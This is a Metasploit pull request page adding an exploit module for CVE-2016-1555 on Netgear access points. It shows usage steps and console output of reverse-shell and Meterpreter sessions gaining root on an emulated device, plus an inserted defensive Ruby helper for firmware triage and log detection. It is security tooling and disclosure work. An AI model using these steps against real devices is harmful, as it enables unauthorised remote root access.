Add module and new wordlist for it for the CVE-2016-1555 vulnerability #10766

Status: Closed. Wants to merge 3 commits into master.


Psi0NYX commented Oct 8, 2018

Add a new module for the CVE-2016-1555 vulnerability that targets the following Netgear devices with these firmwares:

  • WN604 before 3.3.3
  • WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0

The corresponding wordlist file (netgear_boardData_paths.txt) contains all the URIs that might be vulnerable in the target versions. For the first vulnerable URI it finds, it "checks" for unauthenticated arbitrary command execution in the POST request.

Tested on: Netgear WNAP320 firmware 2.0.3, emulated with QEMU, set up by FIRMADYNE.

Verification

  • use exploit/linux/http/netgear_unauth_exec, then set the RHOST, LHOST and SRVHOST options. Default payload is linux/mipsbe/shell_reverse_tcp.
    (screenshot: pull1)

  • Meterpreter for MIPSBE works fine too:
    (screenshot: pull2)

  • No vulnerable URI means that it automatically fails, for both exploit and check:
    (screenshot: pull3)

  • Basic documentation can be found in the documentation/modules/exploit/linux/http/netgear_unauth_exec.md file

Example Output with default payload (linux/mipsbe/shell_reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/IXjlVHwcHNUELM ...
[*] Using URL: http://192.168.0.99:8080/IXjlVHwcHNUELM
[*] Sending the payload to the server...
[*] Command shell session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44785) at 2018-10-08 11:31:45 +0630
[+] Deleted /tmp/IXjlVHwcHNUELM

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
whoami
root

Example Output with meterpreter

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.0.99
SRVHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.0.99
LHOST => 192.168.0.99
msf exploit(linux/http/netgear_unauth_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/netgear_unauth_exec) > 
[*] Started reverse TCP handler on 192.168.0.99:4444 
[+] Got 200 OK for boardDataNA.php
[*] Starting the web service on http://192.168.0.99:8080/UcyqnUAGQ ...
[*] Using URL: http://192.168.0.99:8080/UcyqnUAGQ
[*] Sending the payload to the server...
[*] Sending stage (1108408 bytes) to 192.168.0.100
[*] Meterpreter session 1 opened (192.168.0.99:4444 -> 192.168.0.100:44787) at 2018-10-08 11:34:02 +0630
[+] Deleted /tmp/UcyqnUAGQ

msf exploit(linux/http/netgear_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.0.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >

TODO LIST

  • Actually check for firmware version and vulnerability existence before launching the exploit. Other firmwares from Netgear may also have the same URIs, but might not be vulnerable. The check I used in this module right now is super quick and dirty, not very good at all. (Maybe using the command execution to return some form of verification back to the attacker? Could SNMP work?).
  • Stop the HTTP server after serving the payload! I think it doesn't stop properly after serving a payload or when a session is created.
  • When check is run explicitly, check for vulnerability in all the found URIs, not just the first one that's found. There are at least 2 vulnerable URIs, and one of them is most likely always boardDataWW.php.
  • Test the module against the latest vulnerable firmware versions (WN604 firmware 3.3.3 and WNAP320 firmware 3.5.5.0)
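Added example, written for this page and not part of this PR or the Metasploit module under review: a small Ruby triage helper for the first TODO item above (deciding from model and firmware whether a device is in the affected range) and, from the defender's side, a scan of web-server access-log lines for POST requests to the boardData*.php pages the module probes. The model names, the fixed versions (WN604 at 3.3.3, the other models at 3.5.5.0) and the endpoint names boardDataNA.php and boardDataWW.php come from the PR text; the module name NetgearCve20161555Triage, the combined-log format and the sample log lines are assumptions, and the endpoint pattern generalizes the two named pages to the whole boardData*.php family that the wordlist covers.

```ruby
# Triage helpers for CVE-2016-1555 (Netgear unauthenticated command execution
# via the boardData*.php pages). Example code added for this page; it is not
# the Metasploit module's own check logic.
require 'rubygems' # Gem::Version handles dotted firmware versions such as 3.5.5.0

module NetgearCve20161555Triage
  # First fixed firmware per model, taken from the PR description:
  # WN604 is fixed in 3.3.3, the remaining models in 3.5.5.0.
  FIXED_FIRMWARE = {
    'WN604'     => '3.3.3',
    'WN802TV2'  => '3.5.5.0',
    'WNAP210V2' => '3.5.5.0',
    'WNAP320'   => '3.5.5.0',
    'WNDAP350'  => '3.5.5.0',
    'WNDAP360'  => '3.5.5.0',
    'WNDAP660'  => '3.5.5.0'
  }.freeze

  # true  -> firmware is below the first fixed release (affected)
  # false -> firmware is at or above the fixed release
  # nil   -> model not in the advisory list, or unparsable version (unknown, not "safe")
  def self.affected?(model, firmware)
    fixed = FIXED_FIRMWARE[model.to_s.upcase]
    return nil unless fixed
    Gem::Version.new(firmware.to_s) < Gem::Version.new(fixed)
  rescue ArgumentError
    nil # malformed version string: refuse to guess
  end

  # The PR names boardDataNA.php and boardDataWW.php and ships a wordlist of
  # further boardData*.php paths, so match the whole family (assumption).
  BOARDDATA_PATH = %r{/boardData\w+\.php}i

  # Assumed Apache/nginx "combined" log shape. Real AP logs may differ; adapt
  # this regex to the format you actually collect.
  LOG_LINE = /\A(?<src>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) HTTP\/[\d.]+" (?<status>\d{3})/

  # Constructed sample lines mirroring the module's observable behaviour:
  # a GET probe of the page (the "Got 200 OK" step) followed by the POST.
  SAMPLE_LOG = [
    '192.168.0.50 - - [08/Oct/2018:11:30:02 +0630] "GET /index.php HTTP/1.1" 200 1843',
    '192.168.0.99 - - [08/Oct/2018:11:31:40 +0630] "GET /boardDataNA.php HTTP/1.1" 200 512',
    '192.168.0.99 - - [08/Oct/2018:11:31:45 +0630] "POST /boardDataNA.php HTTP/1.1" 200 512',
    '192.168.0.99 - - [08/Oct/2018:11:31:46 +0630] "POST /boardDataWW.php HTTP/1.1" 404 162'
  ].freeze

  # Returns the lines that record a POST to a boardData page, as hashes with
  # source address, timestamp, path and HTTP status. A hit is a triage signal
  # (these pages are not part of normal administration), not proof of compromise.
  def self.suspicious_requests(lines)
    lines.each_with_object([]) do |line, hits|
      m = LOG_LINE.match(line)
      next unless m && m[:method] == 'POST' && BOARDDATA_PATH.match?(m[:path])
      hits << { src: m[:src], ts: m[:ts], path: m[:path], status: m[:status].to_i }
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  puts "WNAP320 2.0.3 affected? #{NetgearCve20161555Triage.affected?('WNAP320', '2.0.3')}"
  puts "WN604 3.3.3 affected?   #{NetgearCve20161555Triage.affected?('WN604', '3.3.3')}"
  NetgearCve20161555Triage.suspicious_requests(NetgearCve20161555Triage::SAMPLE_LOG).each do |hit|
    puts "#{hit[:ts]} #{hit[:src]} POST #{hit[:path]} -> #{hit[:status]}"
  end
end
```

The version helper returns nil rather than false for models outside the advisory list, so an inventory script cannot silently mark an unknown device as patched; the log scan keeps the GET probe out of its hits but a GET immediately followed by a POST to the same boardData page is the sequence the module produces, which is worth correlating when a hit is investigated.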

Psi0NYX added some commits Oct 8, 2018

Added module for CVE-2016-1555 (netgear_unauth_exec)
and its corresponding wordlist file (netgear_boardData_paths.txt).
Added documentation for
modules/exploit/linux/http/netgear_unauth_exec.rb
Contributor

bcoles commented Oct 8, 2018

Hi @Psi0NYX

Thanks for the contribution.

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on this requirement, please do resubmit from a unique branch.

bcoles closed this Oct 8, 2018

Psi0NYX commented Oct 8, 2018

Defeated by Git sorcery. Created pull request #10768.
